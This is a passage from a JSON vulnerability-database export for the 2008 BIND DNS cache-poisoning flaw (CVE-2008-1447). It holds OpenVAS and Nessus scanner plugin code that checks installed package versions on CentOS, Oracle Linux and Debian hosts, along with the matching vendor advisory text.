{\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"bind-utils\", rpm:\"bind-utils~9.3.4~6.0.2.P1.el5_2\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"caching-nameserver\", rpm:\"caching-nameserver~9.3.4~6.0.1.P1.el5_2\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"caching-nameserver\", rpm:\"caching-nameserver~9.3.4~6.0.2.P1.el5_2\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"selinux-policy\", rpm:\"selinux-policy~2.4.6~137.1.el5_2\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"selinux-policy-devel\", rpm:\"selinux-policy-devel~2.4.6~137.1.el5_2\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"selinux-policy-mls\", rpm:\"selinux-policy-mls~2.4.6~137.1.el5_2\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"selinux-policy-strict\", rpm:\"selinux-policy-strict~2.4.6~137.1.el5_2\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"selinux-policy-targeted\", rpm:\"selinux-policy-targeted~2.4.6~137.1.el5_2\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2017-07-25T10:57:12", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-1447"], "description": "Check for the Version of bind", "modified": "2017-07-10T00:00:00", "published": "2009-02-27T00:00:00", "id": "OPENVAS:880195", "href": "http://plugins.openvas.org/nasl.php?oid=880195", "type": "openvas", "title": "CentOS Update for bind CESA-2008:0533 centos3 i386", "sourceData": 
"###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for bind CESA-2008:0533 centos3 i386\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"ISC BIND (Berkeley Internet Name Domain) is an implementation of the DNS\n (Domain Name System) protocols.\n\n The DNS protocol protects against spoofing attacks by requiring an attacker\n to predict both the DNS transaction ID and UDP source port of a request. In\n recent years, a number of papers have found problems with DNS\n implementations which make it easier for an attacker to perform DNS\n cache-poisoning attacks.\n \n Previous versions of BIND did not use randomized UDP source ports. If an\n attacker was able to predict the random DNS transaction ID, this could make\n DNS cache-poisoning attacks easier. 
In order to provide more resilience,\n BIND has been updated to use a range of random UDP source ports.\n (CVE-2008-1447)\n \n Note: This errata also updates SELinux policy on Red Hat Enterprise Linux 4\n and 5 to allow BIND to use random UDP source ports.\n \n Users of BIND are advised to upgrade to these updated packages, which\n contain a backported patch to add this functionality.\n \n Red Hat would like to thank Dan Kaminsky for reporting this issue.\";\n\ntag_affected = \"bind on CentOS 3\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2008-July/015083.html\");\n script_id(880195);\n script_version(\"$Revision: 6651 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 13:45:21 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-02-27 08:40:14 +0100 (Fri, 27 Feb 2009)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_xref(name: \"CESA\", value: \"2008:0533\");\n script_cve_id(\"CVE-2008-1447\");\n script_name( \"CentOS Update for bind CESA-2008:0533 centos3 i386\");\n\n script_summary(\"Check for the Version of bind\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == 
NULL){\n exit(0);\n}\n\nif(release == \"CentOS3\")\n{\n\n if ((res = isrpmvuln(pkg:\"bind\", rpm:\"bind~9.2.4~22.el3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-chroot\", rpm:\"bind-chroot~9.2.4~22.el3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-devel\", rpm:\"bind-devel~9.2.4~22.el3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-libs\", rpm:\"bind-libs~9.2.4~22.el3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-utils\", rpm:\"bind-utils~9.2.4~22.el3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2019-05-29T18:35:59", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-1447"], "description": "Oracle Linux Local Security Checks ELSA-2008-0789", "modified": "2018-09-28T00:00:00", "published": "2015-10-08T00:00:00", "id": "OPENVAS:1361412562310122563", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310122563", "type": "openvas", "title": "Oracle Linux Local Check: ELSA-2008-0789", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2008-0789.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope 
that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.122563\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-08 14:48:02 +0300 (Thu, 08 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2008-0789\");\n script_tag(name:\"insight\", value:\"ELSA-2008-0789 - dnsmasq security update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2008-0789\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2008-0789.html\");\n script_cve_id(\"CVE-2008-1447\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux5\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) 
exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux5\")\n{\n if ((res = isrpmvuln(pkg:\"dnsmasq\", rpm:\"dnsmasq~2.45~1.el5_2.1\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2017-09-04T14:21:56", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-1447"], "description": "This script attempts to check a DNS server for the predictable-TXID\n DNS recursion vulnerability.\n\n This is a wrapper on the Nmap Security Scanner's (http://nmap.org) dns-random-txid.nse.", "modified": "2017-08-25T00:00:00", "published": "2011-01-06T00:00:00", "id": "OPENVAS:801689", "href": "http://plugins.openvas.org/nasl.php?oid=801689", "type": "openvas", "title": "Nmap NSE: DNS Random TXID", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_nmap_dns_random_txid.nasl 7006 2017-08-25 11:51:20Z teissa $\n#\n# Wrapper for Nmap DNS Random TXID NSE script.\n#\n# Authors:\n# NSE-Script: Brandon Enright <bmenrigh@ucsd.edu>\n# NASL-Wrapper: Sooraj KS <kssooraj@secpod.com>\n#\n# Copyright:\n# NSE-Script: The Nmap Security Scanner (http://nmap.org)\n# NASL-Wrapper: Copyright (c) 2010 Greenbone Networks GmbH (http://www.greenbone.net)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_summary = \"This script attempts to check a DNS server for the predictable-TXID\n DNS recursion vulnerability.\n\n This is a wrapper on the Nmap Security Scanner's (http://nmap.org) dns-random-txid.nse.\";\n\n\nif(description)\n{\n script_id(801689);\n script_version(\"$Revision: 7006 $\");\n script_cve_id(\"CVE-2008-1447\");\n script_bugtraq_id(30131);\n script_tag(name:\"last_modification\", value:\"$Date: 2017-08-25 13:51:20 +0200 (Fri, 25 Aug 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-01-06 14:34:14 +0100 (Thu, 06 Jan 2011)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_name(\"Nmap NSE: DNS Random TXID\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"qod_type\", value:\"remote_analysis\");\n script_copyright(\"NSE-Script: The Nmap Security Scanner; NASL-Wrapper: Greenbone Networks GmbH\");\n script_family(\"Nmap NSE\");\n\n script_mandatory_keys(\"Tools/Present/nmap\");\n script_mandatory_keys(\"Tools/Launch/nmap_nse\");\n script_tag(name : \"summary\" , value : tag_summary);\n exit(0);\n}\n\n\n## Required Keys\nif((! get_kb_item(\"Tools/Present/nmap5.21\") &&\n ! get_kb_item(\"Tools/Present/nmap5.51\")) ||\n ! get_kb_item(\"Tools/Launch/nmap_nse\")) {\n exit(0);\n}\n\n## DNS Port\nport = 53;\nif(! 
get_udp_port_state(port)){\n exit(0);\n}\n\n## Run nmap and Get the result\nres = pread(cmd: \"nmap\", argv: make_list(\"nmap\", \"-sU\", \"--script=dns-random-txid.nse\",\n \"-p\", port, get_host_ip()));\nif(res)\n{\n foreach line (split(res))\n {\n if(ereg(pattern:\"^\\|\",string:line)) {\n result += substr(chomp(line),2) + '\\n';\n }\n\n error = eregmatch(string:line, pattern:\"^nmap: (.*)$\");\n if (error) {\n msg = string('Nmap command failed with following error message:\\n', line);\n log_message(data : msg, port:port);\n }\n }\n\n if(\"dns-random-txid\" >< result) {\n msg = string('Result found by Nmap Security Scanner (dns-random-txid.nse) ',\n 'http://nmap.org:\\n\\n', result);\n security_message(data : msg, port:port);\n }\n}\nelse\n{\n msg = string('Nmap command failed entirely:\\n');\n log_message(data : msg, port:port);\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "nessus": [{"lastseen": "2017-10-29T13:41:33", "edition": 2, "description": "Dan Kaminsky discovered that properties inherent to the DNS protocol lead to practical DNS spoofing and cache poisoning attacks. Among other things, successful attacks can lead to misdirected web traffic and email rerouting.", "published": "2008-07-10T00:00:00", "type": "nessus", "title": "Debian DSA-1605-1 : glibc - DNS cache poisoning", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-1447"], "cpe": ["cpe:/o:debian:debian_linux"], "modified": "2012-12-28T00:00:00", "id": "DEBIAN_DSA-1605.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=33452", "sourceData": "# @DEPRECATED@\n#\n# This script has been deprecated as the associated advisory does not \n# have any package tests.\n#\n# Disabled on 2012/01/20.\n#\n\n# This script was automatically generated from Debian Security \n# Advisory DSA-1605. 
It is released under the Nessus Script \n# Licence.\n#\n# Debian Security Advisory DSA-1605 is (C) Software in the Public\n# Interest, Inc; see http://www.debian.org/license for details.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(33452);\n script_version(\"$Revision: 1.14 $\");\n script_cvs_date(\"$Date: 2012/12/28 21:13:28 $\");\n\n script_cve_id(\"CVE-2008-1447\");\n script_osvdb_id(47232, 47916, 47926, 47927, 48245);\n script_xref(name:\"DSA\", value:\"1605\");\n script_xref(name:\"CERT\", value:\"800113\");\n script_xref(name:\"IAVA\", value:\"2008-A-0045\");\n\n script_name(english:\"Debian DSA-1605-1 : glibc - DNS cache poisoning\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Dan Kaminsky discovered that properties inherent to the DNS protocol\nlead to practical DNS spoofing and cache poisoning attacks. Among\nother things, successful attacks can lead to misdirected web traffic\nand email rerouting.\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"At this time, it is not possible to implement the recommended\ncountermeasures in the GNU libc stub resolver. The following\nworkarounds are available :\n\n 1. Install a local BIND 9 resolver on the host, possibly\n in forward-only mode. BIND 9 will then use source port\n randomization when sending queries over the network.\n (Other caching resolvers can be used instead.)\n\n 2. Rely on IP address spoofing protection if available. 
\n Successful attacks must spoof the address of one of the\n resolvers, which may not be possible if the network is \n guarded properly against IP spoofing attacks (both from \n internal and external sources).\n\nThis DSA will be updated when patches for hardening the stub resolver\nare available.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/07/10\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is (C) 2008-2012 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\n# Deprecated.\nexit(0, \"The associated advisory does not have any package tests.\");\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2021-01-17T12:44:10", "description": "From Red Hat Security Advisory 2008:0533 :\n\nUpdated bind packages that help mitigate DNS spoofing attacks are now\navailable.\n\nThis update has been rated as having important security impact by the\nRed Hat Security Response Team.\n\n[Updated 10th July 2008] We have updated the Enterprise Linux 5\npackages in this advisory. The default and sample caching-nameserver\nconfiguration files have been updated so that they do not specify a\nfixed query-source port. 
Administrators wishing to take advantage of\nrandomized UDP source ports should check their configuration file to\nensure they have not specified fixed query-source ports.\n\nISC BIND (Berkeley Internet Name Domain) is an implementation of the\nDNS (Domain Name System) protocols.\n\nThe DNS protocol protects against spoofing attacks by requiring an\nattacker to predict both the DNS transaction ID and UDP source port of\na request. In recent years, a number of papers have found problems\nwith DNS implementations which make it easier for an attacker to\nperform DNS cache-poisoning attacks.\n\nPrevious versions of BIND did not use randomized UDP source ports. If\nan attacker was able to predict the random DNS transaction ID, this\ncould make DNS cache-poisoning attacks easier. In order to provide\nmore resilience, BIND has been updated to use a range of random UDP\nsource ports. (CVE-2008-1447)\n\nNote: This errata also updates SELinux policy on Red Hat Enterprise\nLinux 4 and 5 to allow BIND to use random UDP source ports.\n\nUsers of BIND are advised to upgrade to these updated packages, which\ncontain a backported patch to add this functionality.\n\nRed Hat would like to thank Dan Kaminsky for reporting this issue.", "edition": 24, "published": "2013-07-12T00:00:00", "title": "Oracle Linux 3 / 4 / 5 : bind (ELSA-2008-0533)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-1447"], "modified": "2013-07-12T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:bind-chroot", "p-cpe:/a:oracle:linux:bind-sdb", "p-cpe:/a:oracle:linux:bind", "p-cpe:/a:oracle:linux:selinux-policy-targeted", "p-cpe:/a:oracle:linux:bind-devel", "p-cpe:/a:oracle:linux:bind-utils", "p-cpe:/a:oracle:linux:caching-nameserver", "cpe:/o:oracle:linux:5", "p-cpe:/a:oracle:linux:selinux-policy", "p-cpe:/a:oracle:linux:bind-libs", "cpe:/o:oracle:linux:3", "p-cpe:/a:oracle:linux:bind-libbind-devel", "p-cpe:/a:oracle:linux:selinux-policy-targeted-sources", "cpe:/o:oracle:linux:4", 
"p-cpe:/a:oracle:linux:selinux-policy-devel", "p-cpe:/a:oracle:linux:selinux-policy-strict", "p-cpe:/a:oracle:linux:selinux-policy-mls"], "id": "ORACLELINUX_ELSA-2008-0533.NASL", "href": "https://www.tenable.com/plugins/nessus/67709", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2008:0533 and \n# Oracle Linux Security Advisory ELSA-2008-0533 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(67709);\n script_version(\"1.21\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2008-1447\");\n script_bugtraq_id(30131);\n script_xref(name:\"RHSA\", value:\"2008:0533\");\n script_xref(name:\"IAVA\", value:\"2008-A-0045\");\n\n script_name(english:\"Oracle Linux 3 / 4 / 5 : bind (ELSA-2008-0533)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2008:0533 :\n\nUpdated bind packages that help mitigate DNS spoofing attacks are now\navailable.\n\nThis update has been rated as having important security impact by the\nRed Hat Security Response Team.\n\n[Updated 10th July 2008] We have updated the Enterprise Linux 5\npackages in this advisory. The default and sample caching-nameserver\nconfiguration files have been updated so that they do not specify a\nfixed query-source port. 
Administrators wishing to take advantage of\nrandomized UDP source ports should check their configuration file to\nensure they have not specified fixed query-source ports.\n\nISC BIND (Berkeley Internet Name Domain) is an implementation of the\nDNS (Domain Name System) protocols.\n\nThe DNS protocol protects against spoofing attacks by requiring an\nattacker to predict both the DNS transaction ID and UDP source port of\na request. In recent years, a number of papers have found problems\nwith DNS implementations which make it easier for an attacker to\nperform DNS cache-poisoning attacks.\n\nPrevious versions of BIND did not use randomized UDP source ports. If\nan attacker was able to predict the random DNS transaction ID, this\ncould make DNS cache-poisoning attacks easier. In order to provide\nmore resilience, BIND has been updated to use a range of random UDP\nsource ports. (CVE-2008-1447)\n\nNote: This errata also updates SELinux policy on Red Hat Enterprise\nLinux 4 and 5 to allow BIND to use random UDP source ports.\n\nUsers of BIND are advised to upgrade to these updated packages, which\ncontain a backported patch to add this functionality.\n\nRed Hat would like to thank Dan Kaminsky for reporting this issue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2008-July/000667.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2008-July/000668.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2008-July/000669.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected bind packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n 
script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:bind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:bind-chroot\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:bind-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:bind-libbind-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:bind-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:bind-sdb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:bind-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:caching-nameserver\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:selinux-policy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:selinux-policy-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:selinux-policy-mls\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:selinux-policy-strict\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:selinux-policy-targeted\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:selinux-policy-targeted-sources\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:5\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2008/07/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/07/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n 
script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^(3|4|5)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 3 / 4 / 5\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL3\", cpu:\"i386\", reference:\"bind-9.2.4-22.el3\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"x86_64\", reference:\"bind-9.2.4-22.el3\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"i386\", reference:\"bind-chroot-9.2.4-22.el3\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"x86_64\", reference:\"bind-chroot-9.2.4-22.el3\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"i386\", reference:\"bind-devel-9.2.4-22.el3\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"x86_64\", reference:\"bind-devel-9.2.4-22.el3\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"i386\", reference:\"bind-libs-9.2.4-22.el3\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"x86_64\", reference:\"bind-libs-9.2.4-22.el3\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"i386\", reference:\"bind-utils-9.2.4-22.el3\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"x86_64\", reference:\"bind-utils-9.2.4-22.el3\")) flag++;\n\nif (rpm_check(release:\"EL4\", reference:\"bind-9.2.4-28.0.1.el4\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"bind-chroot-9.2.4-28.0.1.el4\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"bind-devel-9.2.4-28.0.1.el4\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"bind-libs-9.2.4-28.0.1.el4\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"bind-utils-9.2.4-28.0.1.el4\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"selinux-policy-targeted-1.17.30-2.150.el4\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"selinux-policy-targeted-sources-1.17.30-2.150.el4\")) 
flag++;\n\nif (rpm_check(release:\"EL5\", reference:\"bind-9.3.4-6.0.1.P1.el5_2\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"bind-chroot-9.3.4-6.0.1.P1.el5_2\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"bind-devel-9.3.4-6.0.1.P1.el5_2\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"bind-libbind-devel-9.3.4-6.0.1.P1.el5_2\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"bind-libs-9.3.4-6.0.1.P1.el5_2\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"bind-sdb-9.3.4-6.0.1.P1.el5_2\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"bind-utils-9.3.4-6.0.1.P1.el5_2\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"caching-nameserver-9.3.4-6.0.1.P1.el5_2\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"selinux-policy-2.4.6-137.1.el5_2\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"selinux-policy-devel-2.4.6-137.1.el5_2\")) flag++;\nif (rpm_check(release:\"EL5\", 